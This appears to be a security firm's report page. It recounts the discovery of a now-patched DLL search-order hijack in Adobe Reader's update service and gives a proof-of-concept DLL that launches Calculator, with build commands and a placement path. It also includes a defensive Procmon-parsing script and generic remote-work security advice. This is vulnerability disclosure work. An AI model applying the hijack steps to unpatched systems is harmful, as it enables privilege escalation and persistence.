Our monthly Information Security Report includes a summary of security breaches, threats and vulnerabilities. It is designed to help you gain visibility over the latest events and to help you assess their implication on your environment.
As part of Shearwater’s Managed Security Operations Team, I regularly come across all kinds of exploitable vulnerabilities.
If neglected, these could allow hackers to breach an organisation’s defences, potentially causing irreparable damage.
In most cases, the vulnerabilities I come across are already well-known to security experts. Usually, patches exist to fix them.
However, discovering a new bug for the first time, one that isn’t known by software vendors, security researchers or the general public, is quite rare.
Such a vulnerability is known as a ‘Zero-Day’.
This is the story of how I recently discovered a ‘Zero-Day’ bug in the widely used Adobe Reader.
One day, while performing some vulnerability research, I noticed that the Adobe Update Service runs from a slightly unusual path (Common Files).
While not inherently dangerous, it drew my attention enough to look a little deeper into the service. The AdobeARMService is installed with Adobe Reader, runs as LocalSystem and has the task of keeping Adobe Reader up to date.
I checked the service and binary permissions and did not discover any misconfigurations. Next, I had to work out how the service functioned. For that purpose, I installed Sysinternals' Process Monitor, set it up to capture events and ran the armsvc.exe binary.
I noticed that the program calls out to a DLL that does not exist; this suggested the possibility of a DLL Injection (DLL search-order hijacking).
Windows has a defined search order for DLL files when they are loaded by a program. Interestingly, this program was only looking in the local directory and C:\Windows\SysWOW64\, not the entire search path, suggesting it may be a hardcoded reference. If it was a hardcoded reference left over from development, there is a good chance the program would not be checking that the DLL was signed. If that was the case, by placing a specially crafted DLL in that path, I would be able to execute arbitrary code.
To test my theory, I needed to discover which function armsvc.exe was trying to load from the DLL. To that end, I used the NSA's reverse engineering tool Ghidra.
Reversing the binary, we can see that it tries to load the UnloadUserProfile function from USERENV.dll. With this knowledge, we can code our own DLL, create a function with that name containing whatever code we want, export the function and have armsvc.exe load and execute it.
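As an added example (not part of the original report), here is a small triage script for the Process Monitor step described above: it parses a Procmon CSV export (a constructed sample is embedded), lists the DLL names a process tried to load but never found in any search location, and then filters out the Windows system directories so that what remains are the directories whose ACLs a defender should review. The column names follow Procmon's default CSV export; the process, paths and timestamps in the sample are invented.

```python
import csv
import io
from collections import defaultdict

# Constructed sample of a Process Monitor CSV export (File > Save, CSV format).
# Column layout matches Procmon's default export; the rows are invented for this example.
SAMPLE_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","armsvc.exe","1234","CreateFile","C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\USERENV.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","armsvc.exe","1234","CreateFile","C:\\Windows\\SysWOW64\\USERENV.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.3","armsvc.exe","1234","CreateFile","C:\\Windows\\SysWOW64\\kernel32.dll","SUCCESS","Desired Access: Read Data"
"10:01:03.0","notepad.exe","4321","CreateFile","C:\\Users\\alice\\notes.txt","SUCCESS","Desired Access: Generic Read"
"""

# A miss in the Windows system directories is expected noise; a miss in an
# application directory (Program Files, Common Files, ...) is where a planted
# DLL would land if that directory is writable by a low-privilege user.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def find_missing_dlls(csv_text):
    """Return {(process, pid): [paths]} for DLL loads that ended in NAME NOT FOUND
    and were never satisfied by a successful load of the same file name."""
    rows = list(csv.DictReader(io.StringIO(csv_text)))
    loaded_ok = set()
    for r in rows:
        p = r["Path"].lower()
        if r["Operation"] == "CreateFile" and p.endswith(".dll") and r["Result"] == "SUCCESS":
            loaded_ok.add((r["Process Name"], r["PID"], p.rsplit("\\", 1)[-1]))
    misses = defaultdict(list)
    for r in rows:
        p = r["Path"].lower()
        if r["Operation"] != "CreateFile" or not p.endswith(".dll") or r["Result"] != "NAME NOT FOUND":
            continue
        name = p.rsplit("\\", 1)[-1]
        if (r["Process Name"], r["PID"], name) in loaded_ok:
            continue  # another search location satisfied it; not a dangling reference
        misses[(r["Process Name"], r["PID"])].append(r["Path"])
    return dict(misses)


def hijackable_paths(misses):
    """Keep the never-found DLL paths that lie outside the Windows system
    directories: these are the directories whose write permissions need checking."""
    return [p for paths in misses.values() for p in paths
            if not p.lower().startswith(SYSTEM_DIRS)]
```

Run it against a real export and check the directory ACLs of every path it returns; a directory writable by unprivileged users that a LocalSystem service searches is the condition this article describes.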
For a proof of concept, we can make the function pop open Calculator.
#include <windows.h>
// Standard DLL entry point; nothing is needed here for the proof of concept.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID reserved) { return TRUE; }
// Exported under the name armsvc.exe imports; launches Calculator to prove execution.
extern "C" __declspec(dllexport) void UnloadUserProfile() { WinExec("calc.exe", SW_SHOW); }

# i686-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL USERENV.cpp
# i686-w64-mingw32-g++ -shared -o USERENV.dll USERENV.o
Note that I compiled on Linux with mingw; the code may need to be tweaked for a Visual Studio compilation on Windows.
Copy USERENV.dll to C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\
Run C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe and observe Calculator launching, proving arbitrary code execution.
A malicious actor could use this vulnerability for Privilege Escalation to SYSTEM, for Persistence and for Signed Execution, Whitelisting Bypass/Defence Evasion.
The root cause of this vulnerability was the non-existent DLL reference and not ensuring loaded DLLs are signed.
Thankfully, Adobe moved swiftly to release security updates to fix this ‘Zero-Day’ bug. Click here for further details and remediation solutions.
It’s a timely reminder to everyone to stay on top of software updates and make sure you regularly update patches to keep your systems secure.
Remote working, teleworking, or telecommuting.
Whatever you call it – it is now the new normal.
In short, it is the ability of an organisation’s employees to perform work from locations other than the organisation’s facilities.
Whilst there are many aspects to securing your data and systems as staff work remotely, the three main considerations for every organisation are:
Working from home requires organisational flexibility. Employees will require the use of a variety of devices to do their work, including desktop and laptop computers, smartphones or tablets. These may be supplied by the organisation, allowing easier control over device configurations and settings. Your IT team should maintain control over configurations and settings, ensuring devices are regularly updated and patched.
Increasingly, we see employees using their own personal devices, a practice known as BYOD.
This poses a particular set of challenges to ensure security provisions are adhered to. Your IT team will have limited control over these devices.
If staff must use a personal device, one option is to require the installation of Mobile Device Management (MDM) technology. This helps separate your organisation’s data from their personal information. You will also gain the ability to remotely manage your organisation’s data on the device. However, installing this on many different devices can present many logistical difficulties.
A better option for BYOD management is the use of cloud-based end-point protection tools. These allow you to manage the security and privacy controls on all the devices used by your staff for work, whether the devices are owned by your organisation or by the individual employees. Such systems usually have a single management dashboard where you can install software and run patches on all the devices, saving your IT team a lot of time. It also allows your company security policies to be managed across all devices on the network, including the setting-up of filters and managing settings as required.
The US National Institute of Standards and Technology, or NIST, provides a valuable framework for BYOD security. Covering both computers and mobile devices, it is a great starting point for any organisation concerned with how staff may be using devices while they work remotely.
8 Essential Tips for BYOD Security: Desktop or Laptop Computers
1. Use a combination of security software, such as antivirus software, personal firewalls, spam and web content filtering, and popup blocking, to stop most attacks, particularly malware;
2. Restrict who can use the PC by having a separate standard user account for each person, assigning a password to each user account, using the standard user accounts for daily use, and protecting user sessions from unauthorised physical access;
3. Ensure that updates are regularly applied to the operating system and primary applications, such as web browsers, email clients, instant messaging clients, and security software;
4. Disable unneeded networking features on the PC and configure wireless networking securely;
5. Configure primary applications to filter content and stop other activity that is likely to be malicious;
6. Install and use only known and trusted software;
7. Configure remote access software based on the organisation's requirements and recommendations;
8. Maintain the PC's security on an ongoing basis, such as changing passwords regularly and checking the status of security software periodically.
8 Essential Tips for BYOD Security: Mobile Devices
1. Limit access to the device, such as setting a unique personal identification number (PIN) or password not used elsewhere, and automatically locking the device after an idle period;
2. Disable networking capabilities, such as Bluetooth and Near Field Communication (NFC), except when they are needed;
3. Ensure that security updates, if available, are acquired and installed at least weekly, preferably daily;
4. Configure applications to support security (e.g., blocking activity that is likely to be malicious);
5. Download and run apps only from authorised app stores;
6. Do not jailbreak or root the device;
7. Do not connect the device to an unknown charging station;
8. Use an isolated, protected, and encrypted environment that is supported and managed by the organisation to access the organisation's data and services.
Following these NIST tips will allow organisations to limit the potential risks associated with the use of BYOD.
Whether your staff use devices supplied by the organisation or their own personal devices, make sure you have Full Disk Encryption implemented. This encrypts the entire hard drive of the device and applies to all files, data, software and operating systems.
It is also essential that all devices and the systems they run use multi-factor authentication. By implementing multi-factor authentication on all systems, you significantly reduce the risk of attackers being able to breach your systems.
There are many aspects to securing devices as your staff work from home. Many organisations struggle to keep on top of this. However, the risks of failing to properly secure your devices can be very high.
Consider engaging an external Managed Security Services team. These cybersecurity professionals have the expertise to properly deploy, manage and monitor your end-points, including those inside and outside your network perimeter.
A team of experts will also be able to implement secure cloud-based web and email filtering, as well as provide remote SecOps support and advice to your in-house IT teams as they learn to cope with increased demands resulting from remote work practices.
Importantly, Managed Security Services teams can also provide scalable vulnerability management solutions to ensure bugs are routinely identified and patches applied. They can also be on hand in the event of a breach to provide comprehensive incident response solutions.
Securing Remote Access
It’s essential that remote employees retain the ability to perform their usual work-related tasks.
This will include communicating through a range of channels including email, as well as accessing corporate data and working on corporate files.
To facilitate all these activities, staff will need remote access to a range of systems and applications that are hosted on your organisation’s network. But finding a secure way for them to access your network isn’t always easy. Some of the most common ways include virtual private networks (VPNs), virtual desktops, or access to individual web applications (e.g., webmail).
Whichever you choose, you’re effectively expanding your organisation’s network into people’s homes. This elevates your risk profile to a new level.
You could face the risk of data theft. Your organisation’s corporate, financial, customer and staff data is highly valuable. Any breaches can result in massive losses and can irreparably undermine your organisation’s reputation.
However, data theft isn’t your only risk. If devices are not secured properly, your organisation’s other systems and networks face a range of threats that can cripple essential ICT infrastructure.
If, for example, one of your remote workers uses a device that becomes infected with a worm, this could spread through a virtual desktop to your organisation’s servers.
Meanwhile, VPNs facilitate employees accessing your organisation’s network from home. However, if the VPN isn’t properly secure, it can also provide an opening for attackers. It is essential to verify the identity of VPN tunnel end-points, as using the wrong authentication method could allow an attacker to compromise your corporate network.
Whether your organisation uses VPNs, virtual desktops, or web applications to allow staff to work remotely and access your network and systems, you need experienced Remote Access Penetration Testing more than ever before.
A team of highly experienced penetration testers can evaluate the security of all the components that facilitate remote access and can identify potential weaknesses that could compromise your network from the outside.
Remote Access Penetration Testing is a highly targeted process that interrogates the systems you use for remote access work. Using both unauthenticated and authenticated testing methodologies, we seek to identify any vulnerabilities an attacker may exploit.
With Remote Access Penetration Testing of the systems your staff use to connect into your organisation’s network, you can stay secure and maintain business continuity during this period of working from home.
Securing Staff Practices
If you don’t yet have a Remote Work Policy in place, you need to develop one.
With your staff working remotely, it’s essential that clear rules are in place to guide how they should work and the steps they need to take to keep the organisation’s data and systems secure.
Some of the cybersecurity-related elements your organisation should include in your Remote Work Policy are:
a) Physical Security
Emphasise the need to bear the physical security of their devices in mind. If staff are working outside their home, they should never leave a device unattended. If they step away from their device, the screen should always be locked. Other members of their household should not use a work device. Policies should make clear that staff will be held accountable for lost or stolen devices.
b) Data Security
Make sure staff are transferring corporate data securely. With staff likely to be using less-secure home wi-fi networks, they are more vulnerable to attack. Whilst the network in the corporate environment is likely to have strong security provisions, home networks don't usually have the same protections in place. All the investments your organisation has made in its security, from proxy filtering to network controls, can be redundant in a home environment. Whilst staff can take certain steps to enhance home wi-fi security, such as creating a separate SSID for work activities, it is preferable that your policies make it clear that staff should use a VPN or a virtual desktop when accessing the network or transferring any corporate data.
An even better solution would be to ensure all the systems your staff need are hosted in the cloud, which they can access using multi-factor authentication.
Furthermore, by implementing data loss prevention (DLP) tools, you can block staff from sending sensitive information to an email address outside your company's domain or to cloud storage services, such as Dropbox or Google Drive.
c) Device Security
Ensure your policies clearly state that staff are responsible for ensuring their devices are always updated and patched. This is clearly harder to verify when staff use their own devices. However, emphasising this within the policies will remind staff of their responsibilities for their devices when working remotely.
d) Email Security
Remind staff of the importance of phishing awareness. Human error is one of the largest enablers of cyber-attacks. Staff should be reminded of their obligation to carefully check both the sender and the contents of an email before clicking on any links or opening any attachments. Apart from the risks of malware, credential harvesting can be used to launch Business Email Compromise attacks, identity theft, or social engineering attacks.
Incorporating these considerations into your organisation’s Remote Work Policy will help provide guidance to your staff about how they should behave to keep your data, systems and network secure whilst working from home.
Developing effective and implementable Remote Work Policies can be challenging for organisations that have no experience in this area. By engaging cybersecurity specialists with expertise in policy development, you can ensure the policies your organisation adopts are suitable for your circumstances and cover all the essential elements to enhance your security posture.
How Shearwater Can Help
Shearwater’s range of cybersecurity solutions can meet every aspect of your organisation’s needs as you transition to remote working practices.
Whether you need Managed Security Services teams to protect your devices and network, assistance with Remote Work Policy development, or Remote Access Penetration Testing to identify vulnerabilities that need fixing – Shearwater has the capacity to assist.
Speak to one of our security consultants today for a no-obligation discussion about your organisation’s needs as you transition to remote work.